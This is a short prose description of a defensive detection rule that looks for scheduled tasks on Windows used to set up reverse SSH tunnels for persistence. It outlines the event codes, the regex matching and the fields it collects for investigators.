This detection rule targets the creation of scheduled tasks that may indicate the establishment of reverse SSH tunnels by threat actors on Windows systems. Such activities are noted for enabling persistence—a technique commonly used by adversaries to maintain their access post-compromise. The detection logic employs specific event codes associated with scheduled tasks (EventCode 4103 and EventCode 4104) and utilizes pattern matching with regular expressions to identify commands indicative of SSH tunneling behavior. Noteworthy patterns include various parameters typically associated with SSH commands, such as ports and IP addresses. The filtering criteria are designed to match known indicators of potential abuse involving Living Off the Land (LOL) tactics, specifically one leveraging commonly available binaries and scripts for conducting these operations. The rule aggregates information, such as timestamps, hosts, users, processes, and parent processes, to aid in the thorough investigation of any detected instances, enabling security teams to respond effectively to potential threats.